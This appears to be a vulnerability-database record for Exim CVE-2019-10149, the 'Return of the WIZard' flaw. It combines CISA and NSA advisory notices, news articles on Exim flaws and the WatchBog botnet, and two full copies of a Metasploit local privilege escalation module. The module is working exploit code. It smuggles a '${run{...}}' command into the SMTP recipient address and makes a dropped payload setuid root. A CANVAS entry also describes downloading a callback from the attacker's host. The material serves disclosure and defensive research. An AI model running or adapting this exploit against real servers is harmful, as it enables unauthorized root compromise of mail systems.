"bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "The National Security Agency (NSA) has released a cybersecurity advisory on Russian advanced persistent threat (APT) group Sandworm exploiting a vulnerability\u2014CVE-2019-10149\u2014in Exim Mail Transfer Agent (MTA) software. An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.\n\nAlthough Exim released a [security update](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for the MTA vulnerability in June 2019, Sandworm cyber actors have been exploiting this vulnerability in unpatched Exim servers since at least August 2019 according NSA\u2019s advisory, which provides indicators of compromise and mitigations to detect and block exploit attempts.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to upgrade to the latest version of Exim and review NSA\u2019s [Advisory: Exim Mail Transfer Agent Actively Exploited by Russian GRU Cyber Actors](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) and Exim\u2019s page on [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>); we'd welcome your feedback.\n", "modified": "2020-05-28T00:00:00", "published": "2020-05-28T00:00:00", "id": "CISA:0112C06A4ED522FC96CC36F94A083A95", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim", "type": "cisa", "title": "NSA Releases Advisory on Sandworm Actors Exploiting an Exim Vulnerability ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:07:06", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Exim has released patches to address a vulnerability affecting Exim versions 4.87\u20134.91. A remote attacker could exploit this vulnerability to take control of an affected email server. This vulnerability was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Exim [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) page and either upgrade to Exim 4.92 or apply the necessary patches.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches>); we'd welcome your feedback.\n", "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "CISA:8012376262FFBCAA3DBEE889B5EE4625", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches", "type": "cisa", "title": "Exim Releases Security Patches", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2021-02-25T18:36:01", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n Improper validation of recipient address in deliver_message()\n function in /src/deliver.c may lead to command execution with root privileges\n (CVE-2019-10149).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys', # Discovery and PoC (@qualys)\n 'Dennis Herrmann', # Working exploit (@dhn)\n 'Marco Ivaldi', # Working exploit (@0xdea)\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\n ],\n 'DisclosureDate' => '2019-06-05',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [\n 'Exim 4.87 - 4.91',\n lower_version: Rex::Version.new('4.87'),\n upper_version: Rex::Version.new('4.91')\n ]\n ],\n 'DefaultOptions' =>\n {\n 'PrependSetgid' => true,\n 'PrependSetuid' => true\n },\n 'References' =>\n [\n [ 'CVE', '2019-10149' ],\n [ 'EDB', '46996' ],\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\n ]\n )\n )\n\n register_options(\n [\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\n ]\n )\n\n register_advanced_options(\n [\n OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n )\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def encode_command(cmd)\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\n end\n\n def open_tcp_connection\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\n params = Rex::Socket::Parameters.new({\n 'PeerHost' => '127.0.0.1',\n 'PeerPort' => datastore['EXIMPORT']\n })\n begin\n socket = socket_subsystem.create_tcp_client_channel(params)\n rescue StandardError => e\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n raise e\n end\n return socket_subsystem, socket\n end\n\n def inject_payload(payload)\n if session.type == 'meterpreter'\n socket_subsystem, socket = open_tcp_connection\n\n tcp_conversation = {\n nil => /220/,\n 'helo localhost' => /250/,\n 'MAIL FROM:<>' => /250/,\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\n 'DATA' => /354/,\n 'Received:' => nil,\n '.' => /250/\n }\n\n begin\n tcp_conversation.each do |line, pattern|\n if line\n if line == 'Received:'\n for i in (1..31)\n socket.puts(\"#{line} #{i}\\n\")\n end\n else\n socket.puts(\"#{line}\\n\")\n end\n end\n\n next unless pattern\n\n unless socket.expect(pattern, datastore['ExpectTimeout'])\n fail_with(Failure::TimeoutExpired, \"Pattern not found: #{pattern.inspect}\")\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n ensure\n socket.puts(\"QUIT\\n\")\n socket.close\n socket_subsystem.shutdown\n end\n else\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\n '&& echo true').chomp.to_s == 'true'\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\n end\n\n bash_script = %|\n #!/bin/bash\n\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\n read -u 3 && echo $REPLY\n echo \"helo localhost\" >&3\n read -u 3 && echo $REPLY\n echo \"mail from:<>\" >&3\n read -u 3 && echo $REPLY\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\n read -u 3 && echo $REPLY\n echo \"data\" >&3\n read -u 3 && echo $REPLY\n for i in $(seq 1 30); do\n echo 'Received: $i' >&3\n done\n echo \".\" >&3\n read -u 3 && echo $REPLY\n echo \"quit\" >&3\n read -u 3 && echo $REPLY\n |\n\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@bash_script_path, bash_script)\n register_file_for_cleanup(@bash_script_path)\n chmod(@bash_script_path)\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\n end\n\n print_status('Payload sent, wait a few seconds...')\n Rex.sleep(5)\n end\n\n def on_new_session(session)\n super\n\n if session.type == 'meterpreter'\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\n session.fs.file.rm(@payload_path)\n else\n session.shell_command_token(\"rm -f #{@payload_path}\")\n end\n end\n\n def check\n if session.type == 'meterpreter'\n begin\n socket_subsystem, socket = open_tcp_connection\n rescue StandardError\n return CheckCode::Safe\n end\n res = socket.gets\n socket.close\n socket_subsystem.shutdown\n else\n unless command_exists?('/bin/bash')\n return CheckCode::Safe('bash not found')\n end\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\n \"(read -u 3 && echo $REPLY) || echo false'\")\n if res == 'false'\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n return CheckCode::Safe\n end\n end\n\n if res =~ /Exim ([0-9\\.]+)/i\n version = Rex::Version.new(Regexp.last_match(1))\n vprint_status(\"Found exim version: #{version}\")\n if version >= target[:lower_version] && version <= target[:upper_version]\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n CheckCode::Unknown\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n if nosuid?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\n end\n\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\n 'to get root privileges.')\n end\n\n unless session.type == 'meterpreter'\n unless command_exists?('/bin/bash')\n fail_with(Failure::NotFound, 'bash not found')\n end\n end\n\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@payload_path, payload.encoded_exe)\n register_file_for_cleanup(@payload_path)\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\n \"chmod 4755 #{@payload_path}'\"))\n\n unless setuid?(@payload_path)\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\n end\n\n cmd_exec(\"#{@payload_path} & echo \")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb"}, {"lastseen": "2020-10-15T08:03:24", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2020-07-18T10:00:14", "id": "MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n Improper validation of recipient address in deliver_message()\n function in /src/deliver.c may lead to command execution with root privileges\n (CVE-2019-10149).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys', # Discovery and PoC (@qualys)\n 'Dennis Herrmann', # Working exploit (@dhn)\n 'Marco Ivaldi', # Working exploit (@0xdea)\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\n ],\n 'DisclosureDate' => '2019-06-05',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [\n 'Exim 4.87 - 4.91',\n lower_version: Gem::Version.new('4.87'),\n upper_version: Gem::Version.new('4.91')\n ]\n ],\n 'DefaultOptions' =>\n {\n 'PrependSetgid' => true,\n 'PrependSetuid' => true\n },\n 'References' =>\n [\n [ 'CVE', '2019-10149' ],\n [ 'EDB', '46996' ],\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\n ]\n )\n )\n\n register_options(\n [\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\n ]\n )\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\n OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n )\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def encode_command(cmd)\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\n end\n\n def open_tcp_connection\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\n params = Rex::Socket::Parameters.new({\n 'PeerHost' => '127.0.0.1',\n 'PeerPort' => datastore['EXIMPORT']\n })\n begin\n socket = socket_subsystem.create_tcp_client_channel(params)\n rescue StandardError => e\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n raise e\n end\n return socket_subsystem, socket\n end\n\n def inject_payload(payload)\n if session.type == 'meterpreter'\n socket_subsystem, socket = open_tcp_connection\n\n tcp_conversation = {\n nil => /220/,\n 'helo localhost' => /250/,\n 'MAIL FROM:<>' => /250/,\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\n 'DATA' => /354/,\n 'Received:' => nil,\n '.' => /250/\n }\n\n begin\n tcp_conversation.each do |line, pattern|\n if line\n if line == 'Received:'\n for i in (1..31)\n socket.puts(\"#{line} #{i}\\n\")\n end\n else\n socket.puts(\"#{line}\\n\")\n end\n end\n\n next unless pattern\n\n unless socket.expect(pattern, datastore['ExpectTimeout'])\n fail_with(Failure::TimeoutExpired, \"Pattern not found: #{pattern.inspect}\")\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n ensure\n socket.puts(\"QUIT\\n\")\n socket.close\n socket_subsystem.shutdown\n end\n else\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\n '&& echo true').chomp.to_s == 'true'\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\n end\n\n bash_script = %|\n #!/bin/bash\n\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\n read -u 3 && echo $REPLY\n echo \"helo localhost\" >&3\n read -u 3 && echo $REPLY\n echo \"mail from:<>\" >&3\n read -u 3 && echo $REPLY\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\n read -u 3 && echo $REPLY\n echo \"data\" >&3\n read -u 3 && echo $REPLY\n for i in $(seq 1 30); do\n echo 'Received: $i' >&3\n done\n echo \".\" >&3\n read -u 3 && echo $REPLY\n echo \"quit\" >&3\n read -u 3 && echo $REPLY\n |\n\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@bash_script_path, bash_script)\n register_file_for_cleanup(@bash_script_path)\n chmod(@bash_script_path)\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\n end\n\n print_status('Payload sent, wait a few seconds...')\n Rex.sleep(5)\n end\n\n def on_new_session(session)\n super\n\n if session.type == 'meterpreter'\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\n session.fs.file.rm(@payload_path)\n else\n session.shell_command_token(\"rm -f #{@payload_path}\")\n end\n end\n\n def check\n if session.type == 'meterpreter'\n begin\n socket_subsystem, socket = open_tcp_connection\n rescue StandardError\n return CheckCode::Safe\n end\n res = socket.gets\n socket.close\n socket_subsystem.shutdown\n else\n unless command_exists?('/bin/bash')\n return CheckCode::Safe('bash not found')\n end\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\n \"(read -u 3 && echo $REPLY) || echo false'\")\n if res == 'false'\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n return CheckCode::Safe\n end\n end\n\n if res =~ /Exim ([0-9\\.]+)/i\n version = Gem::Version.new(Regexp.last_match(1))\n vprint_status(\"Found exim version: #{version}\")\n if version >= target[:lower_version] && version <= target[:upper_version]\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n CheckCode::Unknown\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n if nosuid?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\n end\n\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\n 'to get root privileges.')\n end\n\n unless session.type == 'meterpreter'\n unless command_exists?('/bin/bash')\n fail_with(Failure::NotFound, 'bash not found')\n end\n end\n\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@payload_path, payload.encoded_exe)\n register_file_for_cleanup(@payload_path)\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\n \"chmod 4755 #{@payload_path}'\"))\n\n unless setuid?(@payload_path)\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\n end\n\n cmd_exec(\"#{@payload_path} & echo \")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb"}], "canvas": [{"lastseen": "2019-12-11T14:23:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "description": "**Name**| exim_expansion_rce \n---|--- \n**CVE**| CVE-2019-10149 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| exim_expansion_rce \n**Notes**| CVE Name: CVE-2019-10149 \nVENDOR: Exim \nNOTES: A vulnerability exists in Exim since version 4.85 that allows for the execution \nof remote commands as the root user on a system. Current version of the exploit \ninstalls wget if not present and then downloads a CANVAS mosdef callback from \nthe CANVAS host (must be reachable via HTTP). Webserver will bind on port 80 \nif CANVAS is run as root \n \nVersionsAffected: Exim 4.85+ \nRepeatability: Infinite \nReferences: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149 \nDate public: 05/06/2019 \nCVSS: N/A \n\n", "edition": 1, "modified": "2019-06-05T14:29:00", "published": "2019-06-05T14:29:00", "id": "EXIM_EXPANSION_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/exim_expansion_rce", "title": "Immunity Canvas: EXIM_EXPANSION_RCE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2019-09-06T13:38:07", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-15846"], "description": "[](<https://1.bp.blogspot.com/-LF0wUlVHTPE/XXJVEaDaYZI/AAAAAAAA1AE/CYVf9bikZKUqkBq_hHWqYkCYDsOTZcsSACLcBGAs/s728-e100/exim-email-server-vulnerability.jpg>)\n\nA critical remote code execution vulnerability has been discovered in the popular open-source Exim email server software, leaving at least over half a million email servers vulnerable to remote hackers. \n \nExim maintainers today released Exim version 4.92.2 after publishing an early warning two days ago, giving system administrators a [heads-up](<https://www.openwall.com/lists/oss-security/2019/09/04/1>) on its upcoming security patches that affect all versions of the email server software up to and including then-latest 4.92.1. \n \nExim is a widely used, open source mail transfer agent (MTA) software developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which runs almost 60% of the internet's email servers today for routing, delivering and receiving email messages. \n\n\n \nTracked as [CVE-2019-15846](<https://exim.org/static/doc/security/CVE-2019-15846.txt>), the security vulnerability only affects Exim servers that accept TLS connections, potentially allowing attackers to gain root-level access to the system \"by sending an SNI ending in a backslash-null sequence during the initial TLS handshake.\" \n \nSNI, stands for Server Name Indication, is an extension of the TLS protocol that allows the server to safely host multiple TLS certificates for multiple sites, all under a single IP address. \n \nAccording to the Exim team, since the vulnerability doesn't depend on the TLS library being used by the server, both GnuTLS and OpenSSL are affected. \n \nMoreover, though the default configuration of the Exim mail server software doesn't come with TLS enabled, some operating systems bundled the Exim software with the vulnerable feature enabled by default. \n \nThe vulnerability was discovered by an open source contributor and security researcher who goes by the online alias Zerons and analyzed by cybersecurity experts at Qualys. \n\n\n \nJust three months ago, Exim also patched a severe remote command execution vulnerability, tracked as CVE-2019-10149, that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers. \n \nThe Exim advisory says that a rudimentary proof of concept (PoC) exists for this flaw, but currently there is no known exploit available to the public. \n \nServer administrators are highly recommended to install the latest Exim 4.92.2 version immediately, and if not possible, can mitigate the issue by not allowing unpatched Exim servers to accept TLS connections. \n \nThe team says, \"If you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources we will support you in backporting the fix.\"\n", "modified": "2019-09-06T12:48:28", "published": "2019-09-06T12:48:00", "id": "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1", "href": "https://thehackernews.com/2019/09/exim-email-server-vulnerability.html", "type": "thn", "title": "Exim TLS Flaw Opens Email Servers to Remote 'Root' Code Execution Attacks", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-30T16:06:05", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-15846", "CVE-2019-16928"], "description": "[](<https://1.bp.blogspot.com/-XQUxaOT1qPw/XZHxg5L3xhI/AAAAAAAA1RM/kXL-g2O_A307L_tz4BtC_HMeeMoLnYl-QCLcBGAsYHQ/s728-e100/exim-email-server-security.jpg>)\n\nA critical security vulnerability has been discovered and fixed in the popular open-source **Exim **email server software, which could allow a remote attacker to simply crash or potentially execute malicious code on targeted servers. \n \nExim maintainers today [released](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>) an urgent security update\u2014**Exim version 4.92.3**\u2014after publishing an early warning two days ago, giving system administrators an early head-up on its upcoming security patches that affect all versions of the email server software from 4.92 up to and including then-latest version 4.92.2. \n \nExim is a widely used, open source mail transfer agent (MTA) developed for Unix-like operating systems like Linux, Mac OSX or Solaris, which runs almost 60 percent of the Internet's email servers today for routing, delivering and receiving email messages. \n\n\n \nThis is the second time in this month when the Exim maintainers have released an urgent security update. Earlier this month, the team patched a critical remote code execution flaw ([CVE-2019-15846](<https://thehackernews.com/2019/09/exim-email-server-vulnerability.html>)) in the software that could have allowed remote attackers to gain root-level access to the system. \n \nIdentified as [CVE-2019-16928](<https://bugs.exim.org/show_bug.cgi?id=2449>) and discovered by Jeremy Harris of Exim Development Team, the vulnerability is a heap-based buffer overflow (memory corruption) issue in string_vformat defined in string.c file of the EHLO Command Handler component. \n \n\n\n[](<https://1.bp.blogspot.com/-njg27P0fbKk/XZIgMvMWGvI/AAAAAAAA1Rs/w-qj2SUDS4gW6Z17zKTxdnfdDNMTxhZ0ACLcBGAsYHQ/s728-e100/exim-hacking.jpg>)\n\n \nThe security flaw could allow remote attackers to cause a denial of service (DoS) condition or execute arbitrary code on a targeted Exim mail server using a specially crafted line in the EHLO command with the rights of the targeted user. \n \nAccording to the Exim advisory, a currently [known PoC exploit](<https://git.exim.org/exim.git/patch/478effbfd9c3cc5a627fc671d4bf94d13670d65f>) for this vulnerability allows one to only crash the Exim process by sending a long string in the EHLO command, though other commands could also be used to potentially execute arbitrary code. \n \n\n\n> \"The currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message,\" says the Exim developers' team.\n\n \n\n\n> \"While at this mode of operation, Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\"\n\n \nIn mid-year, Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was [actively exploited in the wild](<https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html>) by various groups of hackers to compromise vulnerable servers. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nTherefore, server administrators are highly recommended to install the latest Exim 4.92.3 version as soon as possible, since there is no known mitigation to temporarily resolve this issue. \n \nThe team also says, \"if you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources, we will support you in backporting the fix.\" \n \nThe security update is available for Linux distributions, including [Ubuntu](<https://usn.ubuntu.com/4141-1/>), [Arch Linux](<https://www.archlinux.org/packages/?q=exim>), [FreeBSD](<https://www.vuxml.org/freebsd/e917caba-e291-11e9-89f1-152fed202bb7.html>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2019-16928>), and [Fedora](<https://bodhi.fedoraproject.org/updates/?search=exim>).\n", "modified": "2019-09-30T15:33:26", "published": "2019-09-30T12:14:00", "id": "THN:A947D0153E6D676ABBCCAB69CD1E73DB", "href": "https://thehackernews.com/2019/09/exim-email-security-vulnerability.html", "type": "thn", "title": "New Critical Exim Flaw Exposes Email Servers to Remote Attacks \u2014 Patch Released", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-25T12:44:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2018-1000861", "CVE-2019-0192", "CVE-2019-10149", "CVE-2019-11581", "CVE-2019-7238"], "description": "[](<https://1.bp.blogspot.com/-EUMkX9DWZUw/XTl2aLC2WFI/AAAAAAAA0jg/7Xl_-nE_HVUt9_1bnZYbpy7o3vPWCbGHwCLcBGAs/s728-e100/linux-malware-windows-bluekeep.jpg>)\n\nCybersecurity researchers have discovered a new variant of **WatchBog**, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers vulnerable to the [Bluekeep flaw](<https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html>). \n \nBlueKeep is a highly-critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over RDP protocol. \n \nThough the [patches for the BlueKeep](<https://thehackernews.com/2019/05/microsoft-security-updates.html>) vulnerability (CVE\u20132019-0708) was already released by Microsoft in May this year, more than [800,000 Windows machines](<https://www.bitsight.com/blog/industry-response-to-bluekeep-vulnerability>) accessible over the Internet are still vulnerable to the critical flaw. \n\n\n \nFortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available till the date, potentially preventing opportunistic hackers from wreaking havoc. \n \nHowever, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit. \n\n\n \nIt appears the attackers behind WatchBog are using their botnet network to prepare \"a list of vulnerable systems to target in the future or to sell to third party vendors for profit,\" warned the researchers from [Intezer Lab](<https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/>), who discovered the new WatchBog variant. \n \n\n\n> \"The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,\" the researchers said.\n\n \nThe BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the attacker-controlled servers. \n\n\n[](<https://1.bp.blogspot.com/-vcIC_sHLKcs/XTly86EzVVI/AAAAAAAA0jU/AfdazQ8l2pk3kRCqjySyk2GL3XW7075NQCLcBGAs/s728-e100/BlueKeep-RDP-vulnerability-exploit.png>)\n\nAccording to the researcher, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months. \n \nAlthough WatchBog is operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year. \n \nThe newly-discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly. \n\n\n \nThe WatchBog Linux botnet malware contains several modules, as structurally briefed below, which leverages recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines. \n \n**Pwn Module** \n \n\n\n * CVE-2019-11581 (Jira)\n * CVE-2019-10149 (Exim)\n * CVE-2019-0192 (Solr)\n * CVE-2018-1000861 (Jenkins)\n * CVE-2019-7238 (Nexus Repository Manager 3)\n \n**Scanning Module** \n \n\n\n * BlueKeep Scanner\n * Jira Scanner\n * Solr Scanner\n \n**Brute-forcing Module** \n \n\n\n * CouchDB instances\n * Redis 